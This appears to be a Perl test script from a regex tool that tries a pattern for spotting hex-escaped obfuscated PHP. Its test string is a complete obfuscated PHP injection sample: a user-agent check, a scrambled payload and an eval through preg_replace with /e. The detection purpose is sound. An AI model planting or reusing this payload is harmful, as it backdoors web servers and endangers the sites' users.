use strict;
my $str = '<?php if(!isset($GLOBALS["\\x61\\156\\x75\\156\\x61"])) { $ua=strtolower($_SERVER["\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54"]); if ((! strstr($ua,"\\x6d\\163\\x69\\145")) and (! strstr($ua,"\\x72\\166\\x3a\\61\\x31"))) $GLOBALS["\\x61\\156\\x75\\156\\x61"]=1; } ?><?php $qnberhtivu = \'**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7826057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x$GLOBALS["%x61%156%x75%156%x61"]=1; function825tzw%x5c%x782f%x5c%x7824)#P#-825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,825>%x5c%x782fh%x5c%x7825g<~%x5c%x7824<!%x5c%x7825o:!>!%x5c66%152%x66%147%x67%42%x2c%163%x74%162%x51<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%xc%x7825%x5c%x7824-%x5c%x7824y4%x5c%x78qj%x5c%x78257-K)udfoopdXA%x5c%x7825c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sc%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gjif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset5tww!>!%x5c%x782400~825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x78254+9**-)1%x5c%x782f2986+7**^%x5c%pjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}9%57%x65","%x65%166%5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c7{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!4b!>!%x5c%x7825yy)#}#-#%]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5cs)%x5c%x7825%x5c%x7824-%x5c%x78225!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%7825!<12>j%x5c%x7825!|!*#dpt%x5c%x7825}K;%x5c%x78]48y]#>m%x5c%x7825:|{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572z)%x5c%x7824]25%x5c%x7824-%x5c%x7824-)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]}f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%25#%x5c%x782f#o]#%x5c%xx5c%x7824-%x5c%x7824-tusqptbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd1:|:*mmvo:>:iuhofm%x5c%x7825: fjfgg($n){return chr(ord($n)-1);} @error_report5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]%x7825z!>2<!gps)%x5c%{*w%x5c%x7825)kV%x5c%x7878{**#k#25iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W824gvodujpo!%x5c%x7824-%x5,;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;($GLOBALS["%x61%156%x75%156%x61"])))) { ;!opjudovg}k~~9{d%x5c%x7825:osvT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},04%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+25nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#824Ypp3)%x5c%x7825cB%x5c%x78d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825t%x787f%x5c%x787f<u%x5c%x7825V%c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]25687f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5cqj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%fd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT#]y74]273]y76]252]y85]256973:8297f:5297e:56-%x5c%x7878r.985:52%x7822)gj!|!*nbsbq%x5c%f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%7sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x782%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm60ufldpt}X;%x5c%x786-#2#%x5c%x782f#%x5c%x78.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x27*&7-n%x5c%x7825)utjm6<%x5c%x78;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftm-%x5c%x7825bT-%x5c%x7825hW~%x5c6]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31vso!sboepn)%x5c%x7825epnbss-%x5c%x782%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfu#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldww**WYsboepn)%x5c%x7825bss-%x5c%x782#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x85c1^-%x5c%x7825r%x5c%x785c2^-%x5cfq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x782285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825n]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]25c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k%x782f%x5c%x7825%x5c%x7824-%x5usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5cx5c%x782f#@#%x5c%x782fqp%x5c%x782575]y83]273]y76]277#<%x5c%x7825t2w>x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c7**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x<%x5c%x787fw6*CW&)7gj6<.[A%x]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x782-5ppde:4:|:**#ppde#)tutjyf%x5c%x786985-t.98]K4]65]D8]86]y315c%x7825-bubE{h%x5c%x7825)%x7825!**X)ufttj%x5c27pd%x5c%x78256<pd%x5c%x7825w65c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>0GB)fubfsdXA%x5c%x7827K6<%x5c%91y]c9y]g2y]#>>*4-1-bubE{h!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%c%x78257>%x5c%x782f7&6|7#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-B%x5c%x7825z>!tussfw)%x5c7&6<*rfs%x5c%x78257-K)fujs%x5c%2%x61%171%x5f%155%x61%160%x28%42%xx7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU85c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTtfsqnpdov{h19275j{hnpd19275fubmgoj{h#Y#-#D#-#W#-#C#-#O#-#N#*%x54]342]58]24]31#-%x5c%x7825t%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-825)fnbozcYufhA%x5c%x7jw!>!#]y84]275]y83]248]y83]256c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%xW%x5c%x7825hIr%x5c%x7ofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;l2)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x786pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x78%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x786#<!%x5c%x7825ff2!>!bssbx7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*4]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x77]445]212]445]43]321]464]284]364]6]23K78:56985:6197g:74985-rr.93e:5597f-s.%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x786%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y7627rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5273]D6P2L5P6]y6gP7L6M%x5c%x7825)!gj}Z;h!ot>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%5):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]ex5c%x7825)Rb%x5c%x7825))!gjKc#<%x5c%x7825tpz!>!#]D6M7]K31*!%x5c%x7825b:>1<!fmtf!%xx5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctu6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%xsutcvt-#w#)ldbqov>*ofmy%x55c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5cc%x7825-#+I#)q%x5c%x7825:>:r%x5c%x782#6#)tutjyf%x5c%x7860439275tx7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x78s+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5r%x5c%x7878W~!Ypp2)%x5c%x7825z5r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]27jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78253,j%x5c%x7825>j%x5c%x78!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFx61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%16:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x7cvt)fubmgoj{hA!osvufs!~<7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#0Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7824:*r%x5c%x7825:-t%x5c%x7825)3of:opjudov]y76]72]y3d]51]y35]27k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sut5c%x7825b:>%x5c%x7825s:%x5c%x72%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tux78273qj%x5c%x78256<*Y%x5c%x7.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x%x5c%x7825)sutcvt)!gj!|!*bubE{h%x]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25%x5c%x7825tmw)%x5c%x7825t!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsux787fw6*3qj%x5c%x78257>%x5c%x7822727825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x78:<**#57]38y]47]67y]37]88y]27]28y]#%fid>}&;!osvufs}%x5c%x787fx78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x8257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x785<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfIdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f17y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7)%x5c%x7825%x5c%x7878:-!%x5c%x7ing(0); preg_replace("%x2f%50%x2e%52%x2785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c0;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c29%51%x29%73", NULL); }<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78258272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x76~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7]D4]275]D:M8]Df#<%x5c%xut!-#j0#!%x5c%x782f!**#sfmcnbufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:76767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5,*!|%x5c%x7824-%x5c%x70msvd}R;*msv%x5c%x7825p!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;24-%x5c%x7824]y8%x5c%x7824-%x5c%x7824/(.*)/epreg_replacewbfimtanvm\'; $tphgyinnoa = explode(chr((272-228)),\'878,66,2346,40,120,44,2049,48,9361,39,1169,20,7620,54,5488,34,534,40,3266,61,6482,57,8032,45,9859,66,6061,39,5176,30,7871,58,3567,57,8572,52,3624,32,6228,32,5364,24,0,65,5457,31,1233,67,6443,39,6539,52,726,34,6000,61,5271,30,8500,35,2993,56,8272,29,5848,22,9659,44,8882,66,7490,48,4798,52,9546,65,3327,68,6943,34,1189,44,6165,63,9703,63,8535,37,5522,45,3049,70,8684,60,4995,28,4524,39,8229,43,5963,37,1596,24,3524,20,9993,22,2466,58,3656,66,1969,51,6673,20,1110,59,8136,63,7788,24,7538,23,1048,30,8450,50,6693,53,9137,65,8813,69,5130,26,6977,26,809,69,643,45,1571,25,5301,26,8345,33,7371,46,5206,65,1011,37,1518,53,6260,64,8301,44,7812,59,9468,55,7254,49,4635,34,377,61,4129,58,9790,29,7196,58,8744,69,964,47,6793,27,7561,59,2417,49,9202,62,7735,53,2932,61,5156,20,3243,23,7128,68,65,55,760,49,10015,54,3956,69,8659,25,2386,31,9819,40,7101,27,5701,36,2020,29,5071,35,2524,45,1640,57,4850,40,4593,42,2838,30,9264,66,195,54,4351,65,8948,65,2164,32,1784,66,2279,67,3395,39,1300,60,3544,23,1919,23,4744,54,4890,63,2787,51,5870,30,4479,45,4669,34,3181,25,5023,48,944,20,7674,61,475,25,8624,35,9925,46,7064,37,3434,53,6746,47,9080,57,1697,50,1620,20,8077,38,500,34,2705,54,8378,47,6141,24,1747,37,5327,37,6875,68,1486,32,1360,24,1942,27,312,65,688,38,10069,37,438,37,9971,22,2253,26,6591,61,5900,42,7003,61,4563,30,2868,64,8115,21,6324,45,2759,28,2196,57,1418,68,3913,43,3808,37,7417,31,5432,25,5631,70,5942,21,4317,34,5791,57,8425,25,4025,36,7448,42,6406,37,3206,37,5106,24,1384,34,3845,68,6820,29,4061,68,6652,21,9766,24,7303,68,4416,63,3119,62,3722,31,6100,41,2569,70,3753,55,6369,37,5764,27,9013,67,1078,32,4256,61,7929,46,574,69,6849,26,8199,30,5567,64,9400,68,2143,21,249,63,1850,69,4703,41,3487,37,9330,31,164,31,5388,44,5737,27,4953,42,2097,46,9611,48,4187,69,7975,57,2639,66,9523,23\'); $omosowxizy=substr($qnberhtivu,(54363-44257),(36-29)); if (!function_exists(\'vibujufpqv\')) { function vibujufpqv($mqpvdrpjdc, $lojthtwqre) { $tmdzdlpobi = NULL; for($fwefnbkbcx=0;$fwefnbkbcx<(sizeof($mqpvdrpjdc)/2);$fwefnbkbcx++) { $tmdzdlpobi .= substr($lojthtwqre, $mqpvdrpjdc[($fwefnbkbcx*2)],$mqpvdrpjdc[($fwefnbkbcx*2)+1]); } return $tmdzdlpobi; };} $jantgeljef="\\x20\\57\\x2a\\40\\x71\\150\\x6f\\154\\x6b\\155\\x78\\154\\x79\\145\\x20\\52\\x2f\\40\\x65\\166\\x61\\154\\x28\\163\\x74\\162\\x5f\\162\\x65\\160\\x6c\\141\\x63\\145\\x28\\143\\x68\\162\\x28\\50\\x31\\65\\x30\\55\\x31\\61\\x33\\51\\x29\\54\\x20\\143\\x68\\162\\x28\\50\\x34\\64\\x35\\55\\x33\\65\\x33\\51\\x29\\54\\x20\\166\\x69\\142\\x75\\152\\x75\\146\\x70\\161\\x76\\50\\x24\\164\\x70\\150\\x67\\171\\x69\\156\\x6e\\157\\x61\\54\\x24\\161\\x6e\\142\\x65\\162\\x68\\164\\x69\\166\\x75\\51\\x29\\51\\x3b\\40\\x2f\\52\\x20\\150\\x66\\144\\x65\\151\\x6b\\164\\x6b\\142\\x6a\\40\\x2a\\57\\x20"; $pyheawmojz=substr($qnberhtivu,(55086-44973),(65-53)); $pyheawmojz($omosowxizy, $jantgeljef, NULL); $pyheawmojz=$jantgeljef; $pyheawmojz=(390-269); $qnberhtivu=$pyheawmojz-1; ?><?php';
my $regex = qr/([\"\'])(?P<obf_code>(\\[xX012]?[\dA-Fa-f]{2})*)\1/p;
if ( $str =~ /$regex/g ) {
print "Whole match is ${^MATCH} and its start/end positions can be obtained via \$-[0] and \$+[0]\n";
# print "Capture Group 1 is $1 and its start/end positions can be obtained via \$-[1] and \$+[1]\n";
# print "Capture Group 2 is $2 ... and so on\n";
}
# ${^POSTMATCH} and ${^PREMATCH} are also available with the use of '/p'
# Named capture groups can be called via $+{name}